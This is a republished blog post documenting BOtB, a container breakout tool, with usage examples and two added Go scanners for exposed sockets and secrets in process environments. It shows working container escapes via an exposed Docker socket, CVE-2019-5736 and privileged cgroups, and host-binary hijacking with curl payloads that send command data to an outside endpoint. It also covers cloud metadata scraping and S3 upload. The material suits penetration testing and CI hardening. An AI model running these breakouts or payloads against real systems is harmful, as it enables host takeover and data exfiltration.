
BOtB: a container analysis and exploitation tool

admin 2019-11-10, 167 views, 0 comments

BOtB (Break Out the Box) is a container analysis and exploitation tool designed primarily for penetration testers and engineers.

What can it do for us?

BOtB is a CLI tool with which you can:

Exploit common container vulnerabilities

Perform common container post-exploitation actions

Provide capability when certain tools or binaries are not available in the container

Use BOtB's capabilities together with CI/CD technologies to test container deployments

Perform the above either manually or automatically


Find and identify UNIX domain sockets

Identify UNIX domain sockets that support HTTP

Find and identify the Docker daemon on UNIX domain sockets or on an interface

Analyze and identify sensitive strings in ENV and in process environments in ProcFS (e.g. /proc/{pid}/environ)

Identify metadata service endpoints, i.e. http://169.254.169.254

Perform a container breakout via an exposed Docker daemon

Perform a container breakout via CVE-2019-5736

Hijack host binaries with a custom payload

Perform actions in CI/CD mode and only return exit codes > 0

Scrape metadata from the GCP metadata endpoint

Push data to an S3 bucket

Break out of privileged containers

Force BOtB to always return exit code 0 (useful for non-blocking CI/CD)

Perform the above from CLI arguments or from a YAML config file


BOtB is provided as a binary in the releases.

Building BOtB

BOtB is written in Go, so you can build it with the standard Go tooling. You can do the following:

Get the code:

go get github.com/brompwnie/botb

or

git clone git@github.com:brompwnie/botb.git

Build the code:

govendor init
govendor add github.com/tv42/httpunix
govendor add github.com/kr/pty
go build -o botbsBinary

Usage

BOtB can be compiled into a binary for the target platform; the supported usage is as follows:

Usage of ./botb:
  -aggr string
        Attempt to exploit RuncPWN (default "nil")
  -always-succeed
        Always set BOtB's Exit code to Zero
  -autopwn
        Attempt to autopwn exposed sockets
  -cicd
        Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0
  -config string
        Load config from provided yaml file (default "nil")
  -endpointlist string
        Provide a textfile with endpoints to test (default "nil")
  -find-docker
        Attempt to find Dockerd
  -find-http
        Hunt for Available UNIX Domain Sockets with HTTP
  -find-sockets
        Hunt for Available UNIX Domain Sockets
  -hijack string
        Attempt to hijack binaries on host (default "nil")
  -metadata
        Attempt to find metadata services
  -path string
        Path to Start Scanning for UNIX Domain Sockets (default "/")
  -pwn-privileged string
        Provide a command payload to try exploit --privilege CGROUP release_agent's (default "nil")
  -recon
        Perform Recon of the Container ENV
  -region string
        Provide a AWS Region e.g eu-west-2 (default "nil")
  -s3bucket string
        Provide a bucket name for S3 Push (default "nil")
  -s3push string
        Push a file to S3 e.g Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME would be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil")
  -scrape-gcp
        Attempt to scrape the GCP metadata service
  -verbose
        Verbose output
  -wordlist string
        Provide a wordlist (default "nil")

BOtB can also be instructed to load its settings from a YAML file via the config parameter:

# ./botb -config=cfg.yml
[+] Break Out The Box
[+] Loading Config: cfg.yml
...

The usage examples below return an exit code > 0 by default when an anomaly is detected; this is shown with "echo $?", which prints the exit code of the last command executed.

Finding UNIX domain sockets

#./bob_linux_amd64 -socket=true
[+] Break Out The Box
[+] Hunting Down UNIX Domain Sockets from: /
[!] Valid Socket: /var/meh
[+] Finished
#echo $?
1

Finding the Docker daemon

#./bob_linux_amd64 -find-docker=true
[+] Break Out The Box
[+] Looking for Dockerd
[!] Dockerd DOCKER_HOST found: tcp://0.0.0.0:2375
[+] Hunting Docker Socks
[!] Valid Docker Socket: /var/meh
[+] Finished
#echo $?
1

Breaking out of a container via an exposed Docker daemon

This method breaks out to an interactive TTY on the host.

#./bob_linux_amd64 -autopwn=true
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn: /var/meh
[+] Attempting to escape to host...
[+] Attempting in TTY Mode
./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh
chroot /host && clear
echo 'You are now on the underlying host'
You are now on the underlying host
/ #

Breaking out of a container in a CI/CD-friendly way

This method does not escape into a TTY on the host; instead it returns an exit code > 0 to indicate that the container breakout succeeded.

#./bob_linux_amd64 -autopwn=true -cicd=true
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn: /var/meh
[+] Attempting to escape to host...
[!] Successfully escaped container
[+] Finished
#echo $?
1

Exploiting CVE-2019-5736 with a custom payload

Note that for this to work in this scenario, a process must be executed in the target container.

#./bob_linux_amd64 -aggr='curl "https://some.endpoint.com?command=$0&param1=$1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box
[!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE CONTAINER RUNTIME BUT YOU MIGHT GET SHELLZ...
[+] Attempting to exploit CVE-2019-5736 with command: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1
[+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped
[+] Finished

Hijacking commands/binaries on the host with a custom payload

Note that this can be used to test whether an external entity is executing commands inside the container, for example Docker Exec and kubectl cp.

#./bob_linux_amd64 -hijack='curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box
[!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ...
[+] Attempting to hijack binaries
[*] Command to be used: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1
[+] Currently hijacking: /bin
[+] Currently hijacking: /sbin
[+] Currently hijacking: /usr/bin
[+] Finished

Analyzing ENV and ProcFS for sensitive strings

By default, BOtB searches for "secret" and "password".

./bob_linux_amd64 -recon=true
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[!] Sensitive keyword found in: /proc/1/environ -> 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=0e51200113eaTERM=xtermGOLANG_VERSION=1.12.4GOPATH=/gofoo=secretpasswordHOME=/root'
[!] Sensitive keyword found in: /proc/12/environ -> 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/app/binHOME=/rootfoo=secretpasswordTERM=xtermSHLVL=1PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin_=./bob_linux_amd64OLDPWD=/bin'
[!] Sensitive keyword found in: /proc/self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[!] Sensitive keyword found in: /proc/thread-self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[+] Checking ENV Variables for secrets
[!] Sensitive Keyword found in ENV: foo=secretpassword
[+] Finished
#echo $?
1

A wordlist can be supplied to BOtB to scan for specific keywords.

#cat wordlist.txt
moo
# ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[*] Loading entries from: wordlist.txt
[+] Checking ENV Variables for secrets
[*] Loading entries from: wordlist.txt
[+] Finished
# echo $?
0
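As an added example (my own code, not BOtB's source), here is how the recon check described above can be implemented in Go: each /proc/<pid>/environ is split on the NUL bytes the kernel uses as record separators, every KEY=VALUE record is matched case-insensitively against the default keywords or a -wordlist file, and the matching record is reported on its own. Splitting before matching is the point: the page's output shows what happens when the NULs are simply dropped and all variables run together into one string, which makes the hit hard to attribute to a single variable. The Finding type, the function names and the sample environ bytes are my own constructions; the defaults "secret" and "password" are the ones the page states.

```go
package main

import (
	"bytes"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Finding records one suspicious KEY=VALUE pair found in a process environment.
type Finding struct {
	Source  string // where it was read from, e.g. "/proc/42/environ" or "ENV"
	Keyword string // the wordlist entry that matched
	Entry   string // the full KEY=VALUE record
}

// DefaultWordlist mirrors the defaults the page documents for -recon.
var DefaultWordlist = []string{"secret", "password"}

// LoadWordlist parses a -wordlist style file body: one keyword per line,
// blank lines and surrounding whitespace ignored.
func LoadWordlist(text string) []string {
	var words []string
	for _, line := range strings.Split(text, "\n") {
		if w := strings.TrimSpace(line); w != "" {
			words = append(words, w)
		}
	}
	return words
}

// ScanEnviron splits raw /proc/<pid>/environ content (NUL-separated KEY=VALUE
// records, exactly as the kernel exposes it) and returns each record that
// contains a wordlist keyword, compared case-insensitively. Splitting on NUL
// first keeps the variables apart, so a hit is reported as the single
// KEY=VALUE pair it belongs to rather than as one run-together string.
func ScanEnviron(source string, raw []byte, wordlist []string) []Finding {
	var findings []Finding
	for _, rec := range bytes.Split(raw, []byte{0}) {
		if len(rec) == 0 {
			continue // the trailing NUL yields an empty record
		}
		entry := string(rec)
		lower := strings.ToLower(entry)
		for _, kw := range wordlist {
			if strings.Contains(lower, strings.ToLower(kw)) {
				findings = append(findings, Finding{Source: source, Keyword: kw, Entry: entry})
				break // one finding per record is enough
			}
		}
	}
	return findings
}

// ScanProcFS reads every readable <pid>/environ under procRoot (normally
// "/proc"). Entries that cannot be read (other users' processes, kernel
// threads, processes that exit mid-scan) are skipped, not treated as errors.
func ScanProcFS(procRoot string, wordlist []string) []Finding {
	var findings []Finding
	matches, _ := filepath.Glob(filepath.Join(procRoot, "[0-9]*", "environ"))
	for _, p := range matches {
		raw, err := os.ReadFile(p)
		if err != nil {
			continue
		}
		findings = append(findings, ScanEnviron(p, raw, wordlist)...)
	}
	return findings
}

// ScanOwnEnv checks this process's own environment, as the ENV check does.
func ScanOwnEnv(wordlist []string) []Finding {
	raw := []byte(strings.Join(os.Environ(), "\x00"))
	return ScanEnviron("ENV", raw, wordlist)
}

func main() {
	// Constructed sample; "foo=secretpassword" matches the page's own example.
	sample := []byte("PATH=/usr/bin\x00HOME=/root\x00foo=secretpassword\x00")
	for _, f := range ScanEnviron("sample", sample, DefaultWordlist) {
		fmt.Printf("[!] Sensitive keyword %q found in %s: %s\n", f.Keyword, f.Source, f.Entry)
	}
	// Then the live system: /proc and ENV of wherever this binary runs.
	live := append(ScanProcFS("/proc", DefaultWordlist), ScanOwnEnv(DefaultWordlist)...)
	for _, f := range live {
		fmt.Printf("[!] Sensitive keyword %q found in %s: %s\n", f.Keyword, f.Source, f.Entry)
	}
}
```

In a CI job the natural use is to fail the build when the returned slice is non-empty, which is the same signal BOtB expresses through its exit code; extend DefaultWordlist or load a wordlist for project-specific names such as API key prefixes.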

Scanning metadata endpoints

By default, BOtB scans two metadata endpoints.

# ./bob_linux_amd64 -metadata=true
[+] Break Out The Box
[*] Attempting to query metadata endpoint: 'http://169.254.169.254/latest/meta-data/'
[*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/'
[+] Finished
# echo $?
0

A list of endpoints to scan can also be supplied.

# cat endpoints.txt
https://heroku.com
# ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt
[+] Break Out The Box
[*] Loading entries from: endpoints.txt
[*] Attempting to query metadata endpoint: 'https://heroku.com'
[!] Reponse from 'https://heroku.com' -> 200
[+] Finished
# echo $?
1

Getting interfaces and IPs

# ./bob_linux_amd64 -interfaces=true
[+] Break Out The Box
[+] Attempting to get local network interfaces
[*] Got Interface: lo
[*] Got address: 127.0.0.1/8
[*] Got Interface: tunl0
[*] Got Interface: ip6tnl0
[*] Got Interface: eth0
[*] Got address: 172.17.0.3/16
[+] Finished

Scanning for UNIX domain sockets that respond to HTTP

# ./bob_linux_amd64 -find-http=true
[+] Break Out The Box
[+] Looking for HTTP enabled Sockets
[!] Valid HTTP Socket: /var/run/docker.sock
[+] Finished
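The socket-hunting, Docker-daemon and HTTP-socket checks shown in the sections above can be reproduced with a few lines of Go. The following is an added example of my own, not the BOtB source: it walks a filesystem for UNIX domain sockets, sends GET / over each one to see whether it answers HTTP at all (a syslog or database socket will time out or produce a parse error instead), and then probes the Docker Engine API's GET /_ping, which the daemon answers with 200 and the body "OK", to tell a Docker daemon socket apart from other HTTP listeners. The function names and the 2-second timeout are my assumptions; a socket that is not a real Docker daemon but returns the same ping response would also be reported.

```go
package main

import (
	"context"
	"fmt"
	"io"
	"io/fs"
	"net"
	"net/http"
	"os"
	"path/filepath"
	"time"
)

// FindSockets walks root and returns the path of every UNIX domain socket it
// can see. Directories it cannot read are skipped instead of aborting the walk,
// and /proc and /sys are pruned because they are large and hold no sockets.
func FindSockets(root string) []string {
	var socks []string
	filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err != nil {
			return nil // unreadable entry: move on
		}
		if d.IsDir() && (p == "/proc" || p == "/sys") {
			return fs.SkipDir
		}
		if d.Type()&fs.ModeSocket != 0 {
			socks = append(socks, p)
		}
		return nil
	})
	return socks
}

// unixClient returns an HTTP client whose every connection is dialled to the
// given socket path; the host in the URL is a placeholder the dialler ignores.
func unixClient(sockPath string, timeout time.Duration) *http.Client {
	return &http.Client{
		Timeout: timeout,
		Transport: &http.Transport{
			DialContext: func(ctx context.Context, _, _ string) (net.Conn, error) {
				var d net.Dialer
				return d.DialContext(ctx, "unix", sockPath)
			},
		},
	}
}

// SpeaksHTTP sends GET / over the socket and returns the status code. Any
// well-formed HTTP response, whatever its status, means the socket speaks HTTP;
// a non-HTTP listener yields a parse error or runs into the timeout.
func SpeaksHTTP(sockPath string, timeout time.Duration) (int, error) {
	resp, err := unixClient(sockPath, timeout).Get("http://unix/")
	if err != nil {
		return 0, err
	}
	defer resp.Body.Close()
	io.Copy(io.Discard, resp.Body)
	return resp.StatusCode, nil
}

// LooksLikeDocker probes the Docker Engine API's GET /_ping, which the daemon
// answers with 200 and the body "OK".
func LooksLikeDocker(sockPath string, timeout time.Duration) bool {
	resp, err := unixClient(sockPath, timeout).Get("http://unix/_ping")
	if err != nil {
		return false
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(io.LimitReader(resp.Body, 16))
	return resp.StatusCode == http.StatusOK && string(body) == "OK"
}

func main() {
	root := "/" // optional first argument overrides the scan root, like -path
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	fmt.Printf("[+] Hunting UNIX Domain Sockets from: %s\n", root)
	for _, s := range FindSockets(root) {
		status, err := SpeaksHTTP(s, 2*time.Second)
		switch {
		case err != nil:
			fmt.Printf("[*] Socket: %s (no HTTP response)\n", s)
		case LooksLikeDocker(s, 2*time.Second):
			fmt.Printf("[!] Docker daemon socket: %s\n", s)
		default:
			fmt.Printf("[!] HTTP socket: %s (GET / -> %d)\n", s, status)
		}
	}
}
```

Run inside a container under test, a non-empty Docker result is the condition a CI job should fail on: a mounted daemon socket gives any process in the container control of the host's container runtime, which is exactly the breakout path the -autopwn examples demonstrate.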

Scraping data from the GCP metadata instance

# ./botb_linux_amd64 -scrape-gcp=true
[+] Break Out The Box
[+] Attempting to connect to: 169.254.169.254:80
[*] Output-> HTTP/1.0 200 OK
Metadata-Flavor: Google
Content-Type: application/text
Date: Sun, 30 Jun 2019 21:53:41 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 21013
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0
0.1/meta-data/attached-disks/disks/0/index 0
0.1/meta-data/attached-disks/disks/0/mode READ_WRITE
.....

Pushing data to an AWS S3 bucket

# ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2
[+] Break Out The Box
[+] Pushing fileToPush.tar.gz -> nameOfS3Bucket
[*] Data uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz
[+] Finished

Breaking out of a privileged container

# ./bob_linux_amd64 -pwn-privileged=hostname
[+] Break Out The Box
[+] Attempting to exploit CGROUP Privileges
[*] The result of your command can be found in /output
[+] Finished
root@418fa238e34d:/app# cat /output
docker-desktop

Forcing BOtB to always succeed with exit code 0

This is useful for non-blocking CI/CD tests.

# ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed=true
[+] Break Out The Box
[+] Attempting to exploit CGROUP Privileges
[*] The result of your command can be found in /output
[+] Finished
# echo $?
0

Using BOtB with a YAML config file

Example YAML file cfg.yml:

payload: id
verbose: false
always-succeed: true
cicd: false
endpointlist: endpoints.txt
wordlist: wordlist.txt
path: /
mode: find-sockets

Running BOtB with the YAML above:

# ./bob_linux_amd64 -config=cfg.yml
[+] Break Out The Box
[+] Loading Config: cfg.yml
[+] Looking for UNIX Domain Sockets from: /
[!] Valid Socket: /tmp/thisisnotasocket.mock
[+] Finished

Using BOtB with CI/CD

BOtB can be used with CI/CD technologies, which use exit codes to decide whether a test has passed or failed. Below is a shell script that runs two BOtB tests; their exit codes set the exit code of the script, so if either test returns an exit code > 0, the CI test that runs the script fails.

#!/bin/sh
exitCode=0
echo "[+] Testing UNIX Sockets"
./bob_linux_amd64 -autopwn -cicd=true
# remember a failure rather than letting the second test overwrite it
[ $? -ne 0 ] && exitCode=1
echo "[+] Testing Env"
./bob_linux_amd64 -recon=true
[ $? -ne 0 ] && exitCode=1
exit $exitCode

The script above is not the only way to use BOtB with CI/CD technologies; it can also be run on its own without a shell script wrapper. An example YML configuration:

version: 2
cicd:
  runATest: ./bob_linux_amd64 -autopwn -cicd=true

Below is an example configuration that can be used with Heroku CI (the "scripts" key is the one Heroku's app.json test environment uses):

{
  "environments": {
    "test": {
      "scripts": {
        "test": "./bob_linux_amd64 -autopwn -cicd=true"
      }
    }
  }
}

Below is an example Heroku CI configuration that uses a wrapper shell script instead:

{
  "environments": {
    "test": {
      "scripts": {
        "test": "./bin/testSocksAndEnv.sh"
      }
    }
  }
}

Issues, bugs and improvements

If you have any questions or suggestions for improvement, let us know by opening an issue.

References and resources

This tool would not exist without the contributions of others in the community; below is a list of the resources that helped me.

https://docs.docker.com/engine/security/https/

https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cp

https://docs.docker.com/engine/reference/commandline/exec/

https://github.com/GoogleContainerTools/container-structure-test

https://github.com/coreos/clair

https://github.com/aquasecurity/docker-bench

https://www.cisecurity.org/benchmark/docker/

https://github.com/Frichetten/CVE-2019-5736-PoC

https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/

https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html

https://github.com/wagoodman/dive

https://github.com/cji/talks/blob/master/BruCON2018/Outside%20The%20Box%20-%20BruCON%202018.pdf

https://github.com/singe/container-breakouts

https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/


*Source: GitHub. Compiled by FB editor secist; please credit FreeBuf.COM when reprinting.
